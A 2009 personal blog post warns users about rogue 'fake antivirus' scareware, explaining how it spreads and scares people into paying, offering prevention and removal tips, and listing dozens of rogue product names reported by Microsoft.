Brainfoldb4u's Blog

Just another weblog

Archive for the ‘Virus’ Category

Fake Antivirus Software list nov 2009

Posted by brainfoldb4u on December 28, 2009

Now a days it has become more common for a computer users to receive  pop up from a legitimate website alerting them of a virus or trojans and offering anti-virus software to remove the virus, even though it is not. These pop us are actually created by skilled programmers turned hackers and cyber criminals for personal gain or just few extra bugs.These programs neither scan nor clean computers, and they are actually designed to persuade users that their computers are at risk and scare them into buying the “antivirus” product. They will insist us to install the solution they offer either for free or fewer bugs.

These type of fake antivirus program are widespread and are mostly used by internet criminals. According to Kaspersky labs they have identified more than 20,000 samples in the first half of 2009.  Anti-virus company “Symantec” have claimed to found 250 varieties of scam security software with legitimate sounding names like Anti virus 2010 and SpywareGuard 2008, and about 43 million attempted downloads in one year but did not know how many of the attempted downloads succeeded”  [Source: Symantec]

If we think how do these rouge programs end up on victim machines. Tailored Trojan horse can be used to download such rouge programs, or when a user visit a exploited website can perform a drive by download.  More often either by mistake or by enticement from cyber criminals this programs get into users computer. Criminals raising this software manages to hide the IP address of the page from which malware downloads and installs.

Kaspersky Lab has recently identified a technique used for the dynamic download of rogue antivirus programs. Here’s an example: a script on ********.net/online-j49/yornt.html generated a redirect address, http://******’+encodeURIComponent (document.referrer). The address generated depended on how the user arrived at the page containing the script (done with the help of document.referrer), or, in other words, which site the user had previously viewed. In this case the redirect led to, a page hosting a new rogue antivirus program, FraudTool.Win32.AntivirusPlus.kv.

Once after downloading the program below are some symptoms and actions made to threaten the users

  • IF your computer is infected you will probably receive high number of fake warning alerts with increased pop-ups and hijack of your homepage. You can see your computer being usually slow compensating the performance.
  • Sometimes, to make it more convincing, a fake infected file will be installed on the computer together with the rouge antivirus and later the same fake infected file will be detected during the scanning.
  • Then the software will provide us with a recommendation to clean the virus (though you may not have one) in your computer for some money in return to their solution.
  • If user by any chance click the “remove virus” button then a new window will open asking them to purchase their fake product. If you made a choice to buy that software, different payment method like paypal, Amex, Visa  and bank accounts will be shown as if they were legitimate.

Some basic steps that users can take to prevent from more problem are

  • Rouge antivirus infection will not damage users machine, they are used by cyber criminals to make money from inexperienced users.
  • To not to get trapped, Google the antivirus name that comes up and check whether the name has an official site, technical support or phone support.
  • Beware that legitimate anti-virus companies (both commercial and open source) will not scan your computer for money. Never click the button “install”if you don’t know what the pop up says.

If you choose to get rid of the problem by yourself here are some basic steps  to identify the anti-virus and delete them. Uninstall the suspected anti-virus program using Add/Remove utility in the control panel. After removing the utility, restart your computer in safer mode. Then launch Microsoft security essential or firewall vendor of your choice to run a scan against system files and folders to remove the suspected applications. At situations you may need to remove it manually. Make sure to back up your important files. Press Ctrl + Alt + Del to bring up the task manager. Click on the fake anti-virus image name and choose to stop it from running. Go to Start, Run. Type regedit to start the Registry Editor, where you will drop the entries for WinAntiVirus. Browse to the Hkey_Local_Machine\Software folder from the My Computer folder and delete the series of Registry entries that are described under the fake anti-virus thread. Google and try to get as many as information about that virus and try to manually delete it from your windows folder, but make sure to stop the file processes in the task manager before you actually delete them.

PC Manufactures solution:

To protect your computer, try installing and running an up-to-date anti-virus product such as Microsoft Security Essentials, from microsoft ( look at my earlier article on Microsoft free Anti virus software), MSE provides real time protection against virus, trojan, spyware and adwares. Another option is to run a virus scan with the Windows Live OneCare safety scanner.  Microsoft’s Windows  defender can also be used to remove spyware and other potentially unwanted software from your computer.

Latest list of Rouge Antivirus softwares from Microsoft

Microsoft have released a list of significant threat that AV rogues had posed for our users this year.  Besides the prevalent rogues covered by the MSRT, the following is a longer list of AV rogues detected by Microsoft AV products such as Microsoft Security Essentials, Forefront Client Security, etc.

FakeXPA Winfixer FakeSmoke SpywareSecure
FakePowav FakeScanti Spyguarder IEDefender
MalwareBurn Cleanator AntivirusGold MalWarrior
UnSpyPc MalwareCrush SystemGuard2009 Malwareprotector
DriveCleaner PrivacyChampion WorldAntiSpy SpywareSoftStop
DocrorTrojan SystemLiveProtect Yektel AntiSpyZone

Antivirus2008 Winwebsec FakeSecSen FakeRean
PrivacyCenter FakeRemoc VirusRemover Antivirus2009
SpyLocked SpywareStormer Privacywarrior AntiSpywareDeluxe
Trojanguarder SecurityiGuard PrivacyProtector Searchanddestroy
MyBetterPC DoctorCleaner SpyBlast AlfaCleaner
NeoSpace UniGray FakeFreeAV WebSpyShield

InternetAntivirus WinSpywareProtect FakeSpypro AntiSpywareExpert
Antivirusxp Fakerednefed FakeCog VirusRanger
ErrorGuard Antispyware2008 AntiVirGear SpyDawn
SpyCrush EZCatch VaccineProgram UltimateFixer
Fakeav EvidenceEraser TrustCleaner WinHound
Spyaway Vaccine2008 SearchSpy Spyshield

SpySheriff FakeVimes FakeIA AdvancedCleaner
Antispycheck PCSave AntispyStorm FakePccleaner
SpywareIsolator PSGuard Antivirustrojan SpywareQuake
SpyFalcon SpywareStrike XDef WareOut
PrivacyRedeemer Nothingvirus AntiSpywareSoldier Kazaap
VirusConst AVClean AdsAlert SystemDefender

FakeSpyguard Fakeinit SpyAxe
SpyHeal AntiVirusPro Awola
VirusBurst CodeClean MyNetProtector
VirusRescue Spybouncer FakeWSC
TitanShield MalwareWar DoctorAntivirus
Easyspywarecleaner VirusHeat UltimateDefender

Source: Microsoft fake security Anti virus run up

This list from Microsoft has  new and recent rogues such as FakeXPA, FakeSecSen and FakeRean. It also contains some older rouges that are dated since 4 years such as Winfixer and SpySheriff.


Unfortunately this programs are getting more common. Microsoft encourages PC users run a complete up to date Antivirus products such as Microsoft Security Essentials to protect their computers from these rogues.  Don’t believe any pop-ups other than Google search on your own. Awareness of the threat is very important. Have a look at some of these threats, get familiar with some of the names, screen shots and pass on the word to your friends and families.

Posted in Information Security, Virus | Tagged: | Leave a Comment »